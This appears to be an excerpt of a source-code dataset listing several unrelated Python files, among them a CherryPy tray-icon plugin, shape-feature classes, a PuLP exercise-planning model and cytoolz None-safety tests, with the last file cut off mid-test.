blob_id (stringlengths 40-40) | directory_id (stringlengths 40-40) | path (stringlengths 3-616) | content_id (stringlengths 40-40) | detected_licenses (sequencelengths 0-112) | license_type (stringclasses 2) | repo_name (stringlengths 5-115) | snapshot_id (stringlengths 40-40) | revision_id (stringlengths 40-40) | branch_name (stringclasses 777) | visit_date (timestamp[us] 2015-08-06 10:31:46 to 2023-09-06 10:44:38) | revision_date (timestamp[us] 1970-01-01 02:38:32 to 2037-05-03 13:00:00) | committer_date (timestamp[us] 1970-01-01 02:38:32 to 2023-09-06 01:08:06) | github_id (int64 4.92k to 681M, nullable) | star_events_count (int64 0 to 209k) | fork_events_count (int64 0 to 110k) | gha_license_id (stringclasses 22) | gha_event_created_at (timestamp[us] 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us] 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable) | gha_language (stringclasses 149) | src_encoding (stringclasses 26) | language (stringclasses 1) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64 3 to 10.2M) | extension (stringclasses 188) | content (stringlengths 3 to 10.2M) | authors (sequencelengths 1-1) | author_id (stringlengths 1-132) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c9b9126eb7cfe8ea67cc1dd7bf1da71936a45f80 | 5f4adc8c51f9b7dd67a47f37eaf31e8ddb066f71 | /core/cp_plugins/systray.py | 9fc45cfcbb597ecc1d8dd71abfc8c312a66c380d | [
"Apache-2.0"
] | permissive | cryorooster/watcher | 1a4f186cb9d0a0c84f80e30073b313a0bd049995 | 0dd25241a01d7dcb9ffcd312cc2472b2c9cb2983 | refs/heads/master | 2021-01-23T04:45:09.272825 | 2017-02-05T23:36:39 | 2017-02-05T23:36:49 | 80,380,818 | 0 | 0 | null | 2017-01-29T23:39:16 | 2017-01-29T23:39:15 | null | UTF-8 | Python | false | false | 2,563 | py | import logging
import sys
import webbrowser
import cherrypy
import core
from cherrypy.process import plugins
from infi.systray import SysTrayIcon
logging = logging.getLogger(__name__)
class SysTrayPlugin(plugins.SimplePlugin):
'''
CherryPy plugin that creates a system tray icon for Windows.
Because SysTrayIcon always fires off on_quit, we can't have on_quit
execute cherrypy.engine.exit() if the exit command is what triggered
SysTrayIcon to close. So conditions are set to only fire on_quit when
the quit_method == 'menu'.
This way, when the menu option is called, it destroys SysTrayIcon then
closes cherrypy. Cherrypy will try to close SysTrayIcon by calling
stop(), so stop() gets reassigned to None.
If the app is closed by cherrypy (whether catching a kb interrupt or the GUI
shutdown button), cherrypy stops the plugin by calling stop(). Stop()
reassigns SysTrayIcon._on_quit to None and calls SysTrayIcon.shutdown().
SysTrayIcon is then destroyed (twice for reasons I can't figure out),
then cherrypy finishes up the engine.stop() and engine.exit().
The chain is as such:
Trigger == systray menu 'Quit':
SysTrayIcon._destroy() >
SysTrayIcon._on_quit() > set SysTrayPlugin.quit_method = 'menu'
cherrypy.engine.exit() >
SysTrayPlugin.stop() > does nothing
sys.exit()
Trigger == KBInterrupt or GUI Shutdown:
cherrypy.engine.stop() >
SysTrayPlugin.stop() > disable SysTrayIcon._on_quit()
SysTrayIcon.shutdown() >
SysTrayIcon._destroy() >
SysTrayIcon._destroy() >
cherrypy.engine.exit() >
sys.exit()
'''
def __init__(self, bus):
plugins.SimplePlugin.__init__(self, bus)
menu_options = (('Open Browser', None, self.open),)
self.systray = SysTrayIcon('core/favicon.ico', 'Watcher',
menu_options, on_quit=self.on_quit)
self.quit_method = None
return
def start(self):
self.systray.start()
return
def stop(self):
if self.quit_method == 'menu':
return
else:
self.systray._on_quit = None
self.systray.shutdown()
return
def on_quit(self, systray):
self.quit_method = 'menu'
cherrypy.engine.exit()
sys.exit(0)
# sys tray functions:
def open(self, systray):
webbrowser.open('http://{}:{}{}'.format(
core.SERVER_ADDRESS, core.SERVER_PORT, core.URL_BASE))
return
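# Editor's note: a minimal usage sketch, not part of the original module. It assumes the
# standard CherryPy plugin lifecycle and that 'core/favicon.ico' exists, as in __init__ above.
if __name__ == '__main__':
    import cherrypy
    plugin = SysTrayPlugin(cherrypy.engine)  # SimplePlugin binds against the engine bus
    plugin.subscribe()                       # wires start()/stop() into engine start/stop
    cherrypy.engine.start()                  # start() launches the systray icon thread
    cherrypy.engine.block()                  # quitting from the tray menu calls engine.exit()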
| [
"[email protected]"
] | |
5faff836f01be1ca229e5d45ff91386da1400121 | bc7cd6689a8052d442ded8e876de1e5f22bfad6c | /lsml/feature/provided/shape.py | c4f910d38d3f18cbd76060977e01cb6f94890147 | [
"BSD-3-Clause"
] | permissive | tor4z/level-set-machine-learning | 3a359e0d55137f3c0a9cbcaf25048c61573abd25 | 38460e514d48f3424bb8d3bd58cb3eb330153e64 | refs/heads/master | 2022-04-08T08:04:27.200188 | 2020-01-26T03:09:56 | 2020-01-26T03:09:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,052 | py | import numpy
from skimage.measure import marching_cubes_lewiner as marching_cubes
from skimage.measure import find_contours, mesh_surface_area
from lsml.feature.base_feature import (
BaseShapeFeature, GLOBAL_FEATURE_TYPE, LOCAL_FEATURE_TYPE)
class Size(BaseShapeFeature):
""" Computes the size of the region enclosed by the zero level set of u.
In 1D, this is length. In 2D, it is area, and in 3D, it is volume.
"""
locality = GLOBAL_FEATURE_TYPE
@property
def name(self):
if self.ndim == 1:
return 'Length'
elif self.ndim == 2:
return 'Area'
elif self.ndim == 3:
return 'Volume'
else:
return 'Hyper-volume'
def compute_feature(self, u, dist, mask, dx):
size = (u > 0).sum() * numpy.prod(dx)
feature = numpy.empty_like(u)
feature[mask] = size
return feature
class BoundarySize(BaseShapeFeature):
""" Computes the size of the zero-level set of u. In 2D, this is
the length of the implicit curve. In 3D, it is surface area.
"""
locality = GLOBAL_FEATURE_TYPE
def __init__(self, ndim=2):
if ndim < 2 or ndim > 3:
msg = ("Boundary size is only defined for dimensions 2 and 3; "
"ndim provided = {}")
raise ValueError(msg.format(ndim))
super(BoundarySize, self).__init__(ndim)
@property
def name(self):
if self.ndim == 2:
return 'Curve length'
elif self.ndim == 3:
return 'Surface area'
def compute_feature(self, u, dist, mask, dx):
feature = numpy.empty_like(u)
if self.ndim == 2:
boundary_size = self._compute_arc_length(u, dx)
elif self.ndim == 3:
boundary_size = self._compute_surface_area(u, dx)
else:
msg = "Cannot compute boundary size for ndim = {}"
raise RuntimeError(msg.format(self.ndim))
feature[mask] = boundary_size
return feature
def _compute_arc_length(self, u, dx):
contours = find_contours(u, 0)
total_arc_length = 0.
for contour in contours:
closed_contour = numpy.vstack((contour, contour[0]))
closed_contour *= dx[::-1] # find_contours points in index space
arc_length = numpy.linalg.norm(numpy.diff(closed_contour, axis=0),
axis=1).sum()
total_arc_length += arc_length
return total_arc_length
def _compute_surface_area(self, u, dx):
verts, faces, _, _ = marching_cubes(u, 0., spacing=dx)
return mesh_surface_area(verts, faces)
class IsoperimetricRatio(BaseShapeFeature):
""" Computes the isoperimetric ratio, which is a measure of
circularity in two dimensions and a measure of sphericity in three.
In both cases, the maximum ratio value of 1 is achieved only for
a perfect circle or sphere.
"""
locality = GLOBAL_FEATURE_TYPE
@property
def name(self):
if self.ndim == 2:
return 'Circularity'
else:
return 'Sphericity'
def __init__(self, ndim=2):
if ndim < 2 or ndim > 3:
msg = ("Isoperimetric ratio defined for dimensions 2 and 3; "
"ndim provided = {}")
raise ValueError(msg.format(ndim))
super(IsoperimetricRatio, self).__init__(ndim)
def compute_feature(self, u, dist, mask, dx):
if self.ndim == 2:
return self.compute_feature2d(
u=u, dist=dist, mask=mask, dx=dx)
else:
return self.compute_feature3d(
u=u, dist=dist, mask=mask, dx=dx)
def compute_feature2d(self, u, dist, mask, dx):
# Compute the area
size = Size(ndim=2)
area = size.compute_feature(u=u, dist=dist, mask=mask, dx=dx)
# Compute the curve length
boundary_size = BoundarySize(ndim=2)
curve_length = boundary_size.compute_feature(
u=u, dist=dist, mask=mask, dx=dx)
feature = numpy.empty_like(u)
feature[mask] = 4*numpy.pi*area[mask] / curve_length[mask]**2
return feature
def compute_feature3d(self, u, dist, mask, dx):
# Compute the volume
size = Size(ndim=3)
volume = size(u=u, dist=dist, mask=mask, dx=dx)
# Compute the surface area
boundary_size = BoundarySize(ndim=3)
surface_area = boundary_size(u=u, dist=dist, mask=mask, dx=dx)
feature = numpy.empty_like(u)
feature[mask] = 36*numpy.pi*volume[mask]**2 / surface_area[mask]**3
return feature
class Moments(BaseShapeFeature):
""" Computes the normalized statistical moments of a given order along
a given axis
"""
locality = GLOBAL_FEATURE_TYPE
@property
def name(self):
return "Moments (axes={}; orders={})".format(self.axes, self.orders)
@property
def size(self):
return len(self.axes) * len(self.orders)
def __init__(self, ndim=2, axes=(0, 1), orders=(1, 2)):
""" Initialize a normalized statistical moment feature
ndim: int
Number of dimensions
axes: list[int], default=[0, 1]
The axes along which the moment should be computed
order: list[int], default=[1, 2]
The orders of the moments, e.g., order=1 yields the 'center of
mass' coordinate along the given axis and order=2 yields a measure
of spread along the given axis
"""
super(Moments, self).__init__(ndim)
for axis in axes:
if axis < 0 or axis > ndim-1:
msg = "axis provided ({}) must be one of 0 ... {}"
raise ValueError(msg.format(axis, ndim-1))
for order in orders:
if order < 1:
msg = "Moments order should be greater than or equal to 1"
raise ValueError(msg)
self.axes = axes
self.orders = orders
def _compute_center_of_mass(self, u, dx):
# Initialize center of mass container and mask with singular entry
center_of_mass = numpy.zeros(self.ndim)
mask = numpy.empty(u.shape, dtype=numpy.bool)
mask.ravel()[0] = True
for i in range(self.ndim):
center_of_mass[i] = self._compute_moment(
u=u, dist=u, mask=mask, dx=dx, axis=i, order=1)
return center_of_mass
def _compute_moment(self, u, dist, mask, dx, axis, order):
""" Computes the feature for just a single axis and order """
indices = numpy.indices(u.shape, dtype=numpy.float)
mesh = indices[axis] * dx[axis]
size = Size(ndim=self.ndim)
# Normalize by centering if order is greater than 1
if order > 1:
center_of_mass = self._compute_center_of_mass(u=u, dx=dx)
mesh -= center_of_mass[axis]
measure = size(u=u, dist=dist, mask=mask, dx=dx)[mask].ravel()[0]
moment = (mesh**order)[u > 0].sum() * numpy.prod(dx) / measure
return moment
def compute_feature(self, u, dist, mask, dx):
from itertools import product
features = numpy.empty(u.shape + (self.size,))
for i, (axis, order) in enumerate(product(self.axes, self.orders)):
features[mask, i] = self._compute_moment(
u, dist, mask, dx, axis, order)
return features
class DistanceToCenterOfMass(BaseShapeFeature):
""" Computes the distance to the computed center of mass
"""
locality = LOCAL_FEATURE_TYPE
@property
def name(self):
return "Distance to center of mass"
def compute_feature(self, u, dist, mask, dx):
# Sneakily use the center of mass utility buried in the
# moment feature class
moment_feature = Moments(ndim=self.ndim)
center_of_mass = moment_feature._compute_center_of_mass(u, dx)
# Add extra axes for some broadcasting below
slicer = tuple([slice(None), ] + [None for _ in range(self.ndim)])
indices = numpy.indices(u.shape, dtype=numpy.float)
mesh = indices * dx[slicer]
feature = numpy.empty_like(u)
feature[mask] = numpy.linalg.norm(
mesh - center_of_mass[slicer], axis=0)[mask]
return feature
def get_basic_shape_features(ndim=2, moment_orders=[1, 2]):
""" Generate a list of basic shape features at multiple sigma values
Parameters
----------
ndim : int, default=2
The number of dimension of the image to which these features
will be applied
moment_orders : list[float], default=[1, 2]
Orders for which we compute moments
Returns
-------
features : list[BaseImageFeature]
A list of image feature instances
"""
feature_classes = [
BoundarySize,
DistanceToCenterOfMass,
IsoperimetricRatio,
Moments,
Size,
]
return [
feature_class(ndim=ndim)
for feature_class in feature_classes
]
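# Editor's note: a hedged usage sketch, not part of the original module. The array shape,
# spacing and single-point mask are illustrative assumptions; `u > 0` marks the object region.
if __name__ == '__main__':
    u = numpy.ones((16, 16))                 # every cell lies inside the zero level set
    mask = numpy.zeros(u.shape, dtype=bool)  # evaluate the global feature at one point only
    mask[8, 8] = True
    dx = numpy.array([1.0, 1.0])             # unit grid spacing along both axes
    area = Size(ndim=2).compute_feature(u=u, dist=u, mask=mask, dx=dx)
    print(area[8, 8])                        # 16 * 16 unit cells -> 256.0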
| [
"[email protected]"
] | |
f62998c30aabd3f2ae38cf6aa13b33f4456ef7e1 | d0fe389bae13abfc9d666dc880c50b894b7c212d | /software/tool/test_pipeline/move_file.py | 5fd75b3eebadef6c39cadc438cc9d2d6974eda57 | [] | no_license | ab3nd/TinyRobo | 965c060e95ef6446a609b4954dda042d1ff16311 | b86d2f716fea4bcc420f81e1903484554fb33b51 | refs/heads/master | 2020-04-12T08:49:45.086755 | 2019-07-11T01:59:05 | 2019-07-11T01:59:05 | 39,583,602 | 7 | 2 | null | 2018-07-10T20:05:36 | 2015-07-23T18:17:14 | Jupyter Notebook | UTF-8 | Python | false | false | 819 | py | #!/usr/bin/python
#Get a file that starts with "recognizer_test" in the ~/.ros/ directory, and move it to a new directory
import json
import rosbag
import rospy
import os
import fnmatch
import yaml
#From https://stackoverflow.com/questions/1724693/find-a-file-in-python
def find(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
path = "/home/ams/.ros"
pattern = "recognizer_test*"
#Get the files
files = find(pattern, path)
#Because the file names contains dates, this should more or less get the oldest one
oldName = sorted(files)[0]
#Move it to an appropriately named directory
os.renames(oldName, "test_{0}/{0}_{0}.bag".format('foo')) | [
"[email protected]"
] | |
c55812681bffcd67f705310e9d3133f402e043f6 | 9d8a3a2c0a15dbf1f90d801e6d705d1212cf09af | /services/web__morningstaronline_co_uk.py | ac5fc53d8d59be5e0045ca7297f649f07c83b74c | [] | no_license | rudolphos/NewsGrabber | f9bddc9a9b3a9e02f716133fd746f48cee635b36 | 86354fb769b2710ac7cdd5bd8795e43158b70ad2 | refs/heads/master | 2021-01-12T12:07:55.335079 | 2016-10-09T22:39:17 | 2016-10-09T22:39:17 | 72,316,773 | 0 | 0 | null | 2016-10-30T00:35:08 | 2016-10-30T00:35:08 | null | UTF-8 | Python | false | false | 417 | py | refresh = 5
version = 20160312.01
urls = ['https://www.morningstaronline.co.uk/britain',
'https://www.morningstaronline.co.uk/world',
'https://www.morningstaronline.co.uk/editorial',
'https://www.morningstaronline.co.uk/features',
'https://www.morningstaronline.co.uk/sport',
'https://www.morningstaronline.co.uk/arts']
regex = [r'^https?:\/\/[^\/]*morningstaronline\.co\.uk']
videoregex = []
liveregex = []
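# Editor's note: a small, hedged sanity check added for illustration; it is not part of the
# original service definition and only exercises the module-level regex defined above.
if __name__ == '__main__':
    import re
    assert re.match(regex[0], 'https://www.morningstaronline.co.uk/britain')
    assert not re.match(regex[0], 'https://example.com/britain')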
| [
"[email protected]"
] | |
040bb40356755d5212e78b84510e1694a8c54de4 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03211/s451237439.py | f9efa41c7796ee9c183843e22d4cccb747349d8b | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | s =input()
m = 100000
for i in range(len(s)-2):
a=(s[i:i+3])
m=min(abs(753-int(a)),m)
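# Editor's note (worked example, not part of the original submission): every 3-digit window
# of s is compared with 753. For s = '1234567' the windows 123, 234, 345, 456, 567 give
# absolute differences 630, 519, 408, 297, 186, so the program prints 186.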
print(m) | [
"[email protected]"
] | |
207bee7e203e906fc119bb7df61d83adcdec1d35 | d49f28ea7867cf9ce9512c0521b136934e97b7d2 | /tests/backends/base/test_client.py | 4573bbe97bfb174d2998b800e8ce5e119a7d4da8 | [
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-other-permissive",
"Python-2.0"
] | permissive | tamirverthim/django | cdbc198a055deeb526caff6b18ae874445f217c5 | 666b7048a0dc6b067c1e3f58653f3c7ca00371a2 | refs/heads/master | 2023-04-14T00:51:11.507226 | 2020-12-07T12:19:20 | 2020-12-07T12:19:20 | 319,310,225 | 0 | 0 | BSD-3-Clause | 2023-04-03T23:53:00 | 2020-12-07T12:17:41 | Python | UTF-8 | Python | false | false | 605 | py | from django.db import connection
from django.db.backends.base.client import BaseDatabaseClient
from django.test import SimpleTestCase
class SimpleDatabaseClientTests(SimpleTestCase):
def setUp(self):
self.client = BaseDatabaseClient(connection=connection)
def test_settings_to_cmd_args_env(self):
msg = (
'subclasses of BaseDatabaseClient must provide a '
'settings_to_cmd_args_env() method or override a runshell().'
)
with self.assertRaisesMessage(NotImplementedError, msg):
self.client.settings_to_cmd_args_env(None, None)
| [
"[email protected]"
] | |
bd889e11569d36e3109b85c5a0a51fcde69bafc1 | 14a853584c0c1c703ffd8176889395e51c25f428 | /sem1/csa/project-euler/1/1.py | 2781f342cd824654222ed7b2a8bc9e4e36f07637 | [] | no_license | harababurel/homework | d0128f76adddbb29ac3d805c235cdedc9af0de71 | 16919f3b144de2d170cd6683d54b54bb95c82df9 | refs/heads/master | 2020-05-21T12:25:29.248857 | 2018-06-03T12:04:45 | 2018-06-03T12:04:45 | 43,573,199 | 6 | 4 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | print(sum([x for x in range(1, 100000001) if x % 3 == 0 or x % 5 == 0]))
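# Editor's note: an equivalent closed-form check, not part of the original one-liner. It uses
# inclusion-exclusion over multiples of 3, 5 and 15 and verifies the result against the brute
# force on a small bound; the helper name is the editor's own.
def sum_of_multiples(k, n):
    m = n // k                    # number of multiples of k that are <= n
    return k * m * (m + 1) // 2   # k * (1 + 2 + ... + m)
small = 1000
assert (sum_of_multiples(3, small) + sum_of_multiples(5, small) - sum_of_multiples(15, small)
        == sum(x for x in range(1, small + 1) if x % 3 == 0 or x % 5 == 0))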
| [
"[email protected]"
] | |
760d04f4f37ec49446c5810324797d3ef73de59c | c947a71a16ed180c920d4b362347f980d93bd2fe | /src/Classes/MSDS400/Module 3/workout.py | c7f40dafdf59f5c1f52238d5010dc1fa5ddcbc10 | [
"MIT"
] | permissive | bmoretz/Python-Playground | b69cac015e95d97f46ebd678c4493a44befb556f | a367ec7659b85c24363c21b5c0ac25db08ffa1f6 | refs/heads/master | 2021-05-13T23:35:31.986884 | 2019-11-23T19:07:58 | 2019-11-23T19:07:58 | 116,520,816 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | # As part of a weight reduction program, a man designs a monthly exercise program consisting of bicycling, jogging, and swimming.
# He would like to
# exercise at most 28 hours,
# devote at most 6 hours to swimming,
# and jog for no more than the total number of hours bicycling and swimming.
# The calories burned by this person per hour by bicycling, jogging, and swimming are 200, 427, and 283, respectively.
# How many hours should be allotted to each activity to maximize the number of calories burned? What is the maximum number of calories he will burn?
# (Hint: Write the constraint involving jogging in the form less than or equals 0.)
# Let x1 be the number of hours spent bicycling,
# let x2 be the number of hours spent jogging,
# and let x3 be the number of hours spent swimming.
#
# What is the objective function?
from pulp import *
workout = LpProblem( "Workout Problem", LpMaximize )
x1 = LpVariable( "x1", 0 ) # Bicycling
x2 = LpVariable( "x2", 0 ) # Jogging
x3 = LpVariable( "x3", 0 ) # Swimming
w = LpVariable( "w" )
workout += 200*x1 + 427*x2 + 283*x3
# Constraints
workout += x1 + x2 + x3 <= 28 # no more than total hours
workout += x3 <= 6 # at most 6 hours swimming
workout += x2 <= x1 + x3 # jog no more than Bicycling + Swimming
workout.solve()
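# Editor's note (hand check, not in the original script): with jogging worth the most calories
# per hour, the binding constraints are x2 = x1 + x3 and x1 + x2 + x3 = 28 with x3 at its cap
# of 6, giving x1 = 8, x2 = 14, x3 = 6 and 200*8 + 427*14 + 283*6 = 9276 calories.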
print( LpStatus[ workout.status ] )
for variable in workout.variables():
print("{0} = {1}".format( variable.name, variable.varValue ))
print( 'Optimal Sln: {0}'.format(pulp.value( workout.objective ))) | [
"[email protected]"
] | |
f0365d989dd7c876fa5c7fca77f76477b90906d6 | 44baa6621306c6b9810db48b3c1479cb8db294b3 | /test/test_summaries.py | 890a49aaf4ebb8b1bd8020b972c18679946c46be | [
"Apache-2.0"
] | permissive | codeninja/tensorforce | ecc216e2970194d086209fb726fc64b4b9cd8e93 | 212b115d10a21b8241e1d9df56c4851ffd370f34 | refs/heads/master | 2020-08-13T08:16:11.046478 | 2019-10-18T17:36:03 | 2019-10-18T17:36:03 | 214,937,969 | 2 | 0 | Apache-2.0 | 2019-10-18T17:36:04 | 2019-10-14T03:15:34 | Python | UTF-8 | Python | false | false | 2,058 | py | # Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import unittest
from test.unittest_base import UnittestBase
class TestSummaries(UnittestBase, unittest.TestCase):
exclude_bounded_action = True # TODO: shouldn't be necessary!
require_observe = True
directory = 'test-summaries'
def test_summaries(self):
# FEATURES.MD
self.start_tests()
# 'dropout', 'kl-divergence'
reward_estimation = dict(horizon=2, estimate_horizon='late')
baseline_policy = dict(network=dict(type='auto', size=8, internal_rnn=1))
baseline_objective = 'policy_gradient'
baseline_optimizer = 'adam'
self.unittest(
summarizer=dict(directory=self.__class__.directory, labels='all', frequency=2),
reward_estimation=reward_estimation, baseline_policy=baseline_policy,
baseline_objective=baseline_objective, baseline_optimizer=baseline_optimizer
)
for directory in os.listdir(path=self.__class__.directory):
directory = os.path.join(self.__class__.directory, directory)
for filename in os.listdir(path=directory):
os.remove(path=os.path.join(directory, filename))
assert filename.startswith('events.out.tfevents.')
break
os.rmdir(path=directory)
os.rmdir(path=self.__class__.directory)
self.finished_test()
| [
"[email protected]"
] | |
b0dcde257cf60b3ff95c8d677121bbedec3ea846 | 1dacbf90eeb384455ab84a8cf63d16e2c9680a90 | /pkgs/cytoolz-0.7.5-py27_0/lib/python2.7/site-packages/cytoolz/tests/test_none_safe.py | 62f6280f931530d908a7249f648b54df00f1d677 | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown"
] | permissive | wangyum/Anaconda | ac7229b21815dd92b0bd1c8b7ec4e85c013b8994 | 2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6 | refs/heads/master | 2022-10-21T15:14:23.464126 | 2022-10-05T12:10:31 | 2022-10-05T12:10:31 | 76,526,728 | 11 | 10 | Apache-2.0 | 2022-10-05T12:10:32 | 2016-12-15T05:26:12 | Python | UTF-8 | Python | false | false | 11,403 | py | """ Test that functions are reasonably behaved with None as input.
Typed Cython objects (like dict) may also be None. Using functions from
Python's C API that expect a specific type but receive None instead can cause
problems such as throwing an uncatchable SystemError (and some systems may
segfault instead). We obviously don't want that to happen! As the tests
below discovered, this turned out to be a rare occurrence. The only changes
required were to use `d.copy()` instead of `PyDict_Copy(d)`, and to always
return Python objects from functions instead of int or bint (so exceptions
can propagate).
The vast majority of functions throw TypeError. The vast majority of
functions also behave the same in `toolz` and `cytoolz`. However, there
are a few minor exceptions. Since passing None to functions is an edge case
that doesn't have well-established behavior yet (other than raising TypeError),
the tests in this file serve to verify that the behavior is at least
reasonably well-behaved and don't cause SystemErrors.
"""
# XXX: This file could be back-ported to `toolz` once unified testing exists.
import cytoolz
from cytoolz import *
from cytoolz.utils import raises
from operator import add
class GenException(object):
def __init__(self, exc):
self.exc = exc
def __iter__(self):
return self
def __next__(self):
raise self.exc
def next(self):
raise self.exc
def test_dicttoolz():
tested = []
assert raises((TypeError, AttributeError), lambda: assoc(None, 1, 2))
tested.append('assoc')
assert raises((TypeError, AttributeError), lambda: dissoc(None, 1))
tested.append('dissoc')
# XXX
assert (raises(TypeError, lambda: get_in(None, {})) or
get_in(None, {}) is None)
assert raises(TypeError, lambda: get_in(None, {}, no_default=True))
assert get_in([0, 1], None) is None
assert raises(TypeError, lambda: get_in([0, 1], None, no_default=True))
tested.append('get_in')
assert raises(TypeError, lambda: keyfilter(None, {1: 2}))
assert raises((AttributeError, TypeError), lambda: keyfilter(identity, None))
tested.append('keyfilter')
# XXX
assert (raises(TypeError, lambda: keymap(None, {1: 2})) or
keymap(None, {1: 2}) == {(1,): 2})
assert raises((AttributeError, TypeError), lambda: keymap(identity, None))
tested.append('keymap')
assert raises(TypeError, lambda: merge(None))
assert raises((TypeError, AttributeError), lambda: merge(None, None))
tested.append('merge')
assert raises(TypeError, lambda: merge_with(None, {1: 2}, {3: 4}))
assert raises(TypeError, lambda: merge_with(identity, None))
assert raises((TypeError, AttributeError),
lambda: merge_with(identity, None, None))
tested.append('merge_with')
assert raises(TypeError, lambda: update_in({1: {2: 3}}, [1, 2], None))
assert raises(TypeError, lambda: update_in({1: {2: 3}}, None, identity))
assert raises((TypeError, AttributeError),
lambda: update_in(None, [1, 2], identity))
tested.append('update_in')
assert raises(TypeError, lambda: valfilter(None, {1: 2}))
assert raises((AttributeError, TypeError), lambda: valfilter(identity, None))
tested.append('valfilter')
# XXX
assert (raises(TypeError, lambda: valmap(None, {1: 2})) or
valmap(None, {1: 2}) == {1: (2,)})
assert raises((AttributeError, TypeError), lambda: valmap(identity, None))
tested.append('valmap')
assert (raises(TypeError, lambda: itemmap(None, {1: 2})) or
itemmap(None, {1: 2}) == {1: (2,)})
assert raises((AttributeError, TypeError), lambda: itemmap(identity, None))
tested.append('itemmap')
assert raises(TypeError, lambda: itemfilter(None, {1: 2}))
assert raises((AttributeError, TypeError), lambda: itemfilter(identity, None))
tested.append('itemfilter')
s1 = set(tested)
s2 = set(cytoolz.dicttoolz.__all__)
assert s1 == s2, '%s not tested for being None-safe' % ', '.join(s2 - s1)
def test_functoolz():
tested = []
assert raises(TypeError, lambda: complement(None)())
tested.append('complement')
assert compose(None) is None
assert raises(TypeError, lambda: compose(None, None)())
tested.append('compose')
assert raises(TypeError, lambda: curry(None))
tested.append('curry')
assert raises(TypeError, lambda: do(None, 1))
tested.append('do')
assert identity(None) is None
tested.append('identity')
assert raises(TypeError, lambda: juxt(None))
assert raises(TypeError, lambda: list(juxt(None, None)()))
tested.append('juxt')
assert memoize(identity, key=None)(1) == 1
assert memoize(identity, cache=None)(1) == 1
tested.append('memoize')
assert raises(TypeError, lambda: pipe(1, None))
tested.append('pipe')
assert thread_first(1, None) is None
tested.append('thread_first')
assert thread_last(1, None) is None
tested.append('thread_last')
assert flip(lambda a, b: (a, b))(None)(None) == (None, None)
tested.append('flip')
s1 = set(tested)
s2 = set(cytoolz.functoolz.__all__)
assert s1 == s2, '%s not tested for being None-safe' % ', '.join(s2 - s1)
def test_itertoolz():
tested = []
assert raises(TypeError, lambda: list(accumulate(None, [1, 2])))
assert raises(TypeError, lambda: list(accumulate(identity, None)))
tested.append('accumulate')
assert raises(TypeError, lambda: concat(None))
assert raises(TypeError, lambda: list(concat([None])))
tested.append('concat')
assert raises(TypeError, lambda: list(concatv(None)))
tested.append('concatv')
assert raises(TypeError, lambda: list(cons(1, None)))
tested.append('cons')
assert raises(TypeError, lambda: count(None))
tested.append('count')
# XXX
assert (raises(TypeError, lambda: list(drop(None, [1, 2]))) or
list(drop(None, [1, 2])) == [1, 2])
assert raises(TypeError, lambda: list(drop(1, None)))
tested.append('drop')
assert raises(TypeError, lambda: first(None))
tested.append('first')
assert raises(TypeError, lambda: frequencies(None))
tested.append('frequencies')
assert raises(TypeError, lambda: get(1, None))
assert raises(TypeError, lambda: get([1, 2], None))
tested.append('get')
assert raises(TypeError, lambda: groupby(None, [1, 2]))
assert raises(TypeError, lambda: groupby(identity, None))
tested.append('groupby')
assert raises(TypeError, lambda: list(interleave(None)))
assert raises(TypeError, lambda: list(interleave([None, None])))
assert raises(TypeError,
lambda: list(interleave([[1, 2], GenException(ValueError)],
pass_exceptions=None)))
tested.append('interleave')
assert raises(TypeError, lambda: list(interpose(1, None)))
tested.append('interpose')
assert raises(TypeError, lambda: isdistinct(None))
tested.append('isdistinct')
assert isiterable(None) is False
tested.append('isiterable')
assert raises(TypeError, lambda: list(iterate(None, 1)))
tested.append('iterate')
assert raises(TypeError, lambda: last(None))
tested.append('last')
# XXX
assert (raises(TypeError, lambda: list(mapcat(None, [[1], [2]]))) or
list(mapcat(None, [[1], [2]])) == [[1], [2]])
assert raises(TypeError, lambda: list(mapcat(identity, [None, [2]])))
assert raises(TypeError, lambda: list(mapcat(identity, None)))
tested.append('mapcat')
assert raises(TypeError, lambda: list(merge_sorted(None, [1, 2])))
tested.append('merge_sorted')
assert raises(TypeError, lambda: nth(None, [1, 2]))
assert raises(TypeError, lambda: nth(0, None))
tested.append('nth')
assert raises(TypeError, lambda: partition(None, [1, 2, 3]))
assert raises(TypeError, lambda: partition(1, None))
tested.append('partition')
assert raises(TypeError, lambda: list(partition_all(None, [1, 2, 3])))
assert raises(TypeError, lambda: list(partition_all(1, None)))
tested.append('partition_all')
assert raises(TypeError, lambda: list(pluck(None, [[1], [2]])))
assert raises(TypeError, lambda: list(pluck(0, [None, [2]])))
assert raises(TypeError, lambda: list(pluck(0, None)))
tested.append('pluck')
assert raises(TypeError, lambda: reduceby(None, add, [1, 2, 3], 0))
assert raises(TypeError, lambda: reduceby(identity, None, [1, 2, 3], 0))
assert raises(TypeError, lambda: reduceby(identity, add, None, 0))
tested.append('reduceby')
assert raises(TypeError, lambda: list(remove(None, [1, 2])))
